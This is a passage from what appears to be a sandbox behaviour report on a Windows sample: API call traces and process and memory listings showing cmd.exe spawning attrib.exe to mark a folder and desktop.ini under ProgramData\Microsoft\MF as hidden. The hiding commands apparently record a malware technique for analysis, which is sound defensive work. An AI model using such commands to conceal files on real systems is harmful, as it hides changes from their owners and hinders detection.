lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.372] _close (_FileHandle=4) returned 0 [0151.375] FindNextFileW (in: hFindFile=0x40e628, lpFindFileData=0x30f108 | out: lpFindFileData=0x30f108) returned 0 [0151.376] GetLastError () returned 0x12 [0151.376] FindClose (in: hFindFile=0x40e628 | out: hFindFile=0x40e628) returned 1 [0151.376] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0151.382] _close (_FileHandle=3) returned 0 [0151.382] GetConsoleTitleW (in: lpConsoleTitle=0x30f540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0151.383] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0151.383] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0151.383] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0151.383] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0xffffffff [0151.383] GetLastError () returned 0x2 [0151.383] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0xffffffff [0151.386] GetLastError () returned 0x2 [0151.386] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0x40e628 [0151.387] FindClose (in: hFindFile=0x40e628 | out: hFindFile=0x40e628) returned 1 [0151.387] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0xffffffff [0151.387] GetLastError () returned 0x2 [0151.387] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0x40e628 [0151.387] FindClose (in: hFindFile=0x40e628 | out: hFindFile=0x40e628) returned 1 [0151.387] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0151.387] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0151.387] GetConsoleTitleW (in: lpConsoleTitle=0x30f2d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0151.387] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f15c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f224 | out: lpAttributeList=0x30f15c, lpSize=0x30f224) returned 1 [0151.387] UpdateProcThreadAttribute (in: lpAttributeList=0x30f15c, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f21c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f15c, lpPreviousValue=0x0) returned 1 [0151.388] GetStartupInfoW (in: lpStartupInfo=0x30f118 | out: lpStartupInfo=0x30f118*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0151.388] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0151.388] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f1b8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f204 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" ", lpProcessInformation=0x30f204*(hProcess=0x4c, hThread=0x50, dwProcessId=0xa20, dwThreadId=0xca8)) returned 1 [0151.391] CloseHandle (hObject=0x50) returned 1 [0151.391] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0151.392] GetEnvironmentStringsW () returned 0x412cb0* [0151.392] FreeEnvironmentStringsW (penv=0x412cb0) returned 1 [0151.392] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0151.441] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x30f0f8 | out: lpExitCode=0x30f0f8*=0x0) returned 1 [0151.441] CloseHandle (hObject=0x4c) returned 1 [0151.441] _vsnwprintf (in: _Buffer=0x30f240, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f104 | out: _Buffer="00000000") returned 8 [0151.441] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0151.441] GetEnvironmentStringsW () returned 0x412cb0* [0151.441] FreeEnvironmentStringsW (penv=0x412cb0) returned 1 [0151.441] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0151.441] GetEnvironmentStringsW () returned 0x412cb0* [0151.441] FreeEnvironmentStringsW (penv=0x412cb0) returned 1 [0151.441] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f15c | out: lpAttributeList=0x30f15c) [0151.441] GetConsoleTitleW (in: lpConsoleTitle=0x30f540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0151.442] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0151.442] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0151.442] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0151.442] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0xffffffff [0151.442] GetLastError () returned 0x2 [0151.442] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0xffffffff [0151.442] GetLastError () returned 0x2 [0151.443] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0x40e628 [0151.443] FindClose (in: hFindFile=0x40e628 | out: hFindFile=0x40e628) returned 1 [0151.443] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0xffffffff [0151.443] GetLastError () returned 0x2 [0151.443] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0x40e628 [0151.443] FindClose (in: hFindFile=0x40e628 | out: hFindFile=0x40e628) returned 1 [0151.443] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0151.443] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0151.443] GetConsoleTitleW (in: lpConsoleTitle=0x30f2d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0151.443] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f15c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f224 | out: lpAttributeList=0x30f15c, lpSize=0x30f224) returned 1 [0151.443] UpdateProcThreadAttribute (in: lpAttributeList=0x30f15c, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f21c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f15c, lpPreviousValue=0x0) returned 1 [0151.443] GetStartupInfoW (in: lpStartupInfo=0x30f118 | out: lpStartupInfo=0x30f118*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0151.444] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0151.444] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f1b8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f204 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\"", lpProcessInformation=0x30f204*(hProcess=0x50, hThread=0x4c, dwProcessId=0x300, dwThreadId=0xce8)) returned 1 [0151.446] CloseHandle (hObject=0x4c) returned 1 [0151.446] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0151.446] GetEnvironmentStringsW () returned 0x413668* [0151.446] FreeEnvironmentStringsW (penv=0x413668) returned 1 [0151.446] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0151.486] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30f0f8 | out: lpExitCode=0x30f0f8*=0x0) returned 1 [0151.486] CloseHandle (hObject=0x50) returned 1 [0151.486] _vsnwprintf (in: _Buffer=0x30f240, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f104 | out: _Buffer="00000000") returned 8 [0151.486] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0151.486] GetEnvironmentStringsW () returned 0x413668* [0151.486] FreeEnvironmentStringsW (penv=0x413668) returned 1 [0151.486] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0151.487] GetEnvironmentStringsW () returned 0x413668* [0151.487] FreeEnvironmentStringsW (penv=0x413668) returned 1 [0151.487] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f15c | out: lpAttributeList=0x30f15c) [0151.487] _get_osfhandle (_FileHandle=1) returned 0x7 [0151.487] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0151.487] _get_osfhandle (_FileHandle=1) returned 0x7 [0151.487] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0151.487] _get_osfhandle (_FileHandle=0) returned 0x3 [0151.487] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0151.487] SetConsoleInputExeNameW () returned 0x1 [0151.487] GetConsoleOutputCP () returned 0x1b5 [0151.488] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0151.488] SetThreadUILanguage (LangId=0x0) returned 0x409 [0151.488] exit (_Code=0) Process: id = "241" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16920" os_pid = "0xcfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "240" os_parent_pid = "0xc28" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19885 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19886 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19887 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19888 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 19889 start_va = 0x9f0000 end_va = 0x9f6fff entry_point = 0x9f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 19890 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19891 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19892 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19893 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 19894 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19895 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19896 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19897 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19898 start_va = 0x1b0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 19899 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 19900 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 19901 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19902 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 19903 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19904 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19905 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19906 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19907 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19908 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19909 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19910 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19911 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19912 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 19913 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19914 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 304 os_tid = 0xa18 Process: id = "242" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16b60" os_pid = "0xa20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "240" os_parent_pid = "0xc28" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20000 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20001 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20002 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20003 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 20004 start_va = 0x4f0000 end_va = 0x4f6fff entry_point = 0x4f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 20005 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20006 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20007 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20008 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 20009 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20010 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20011 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20012 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20013 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 20014 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 20015 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 20016 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20017 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: 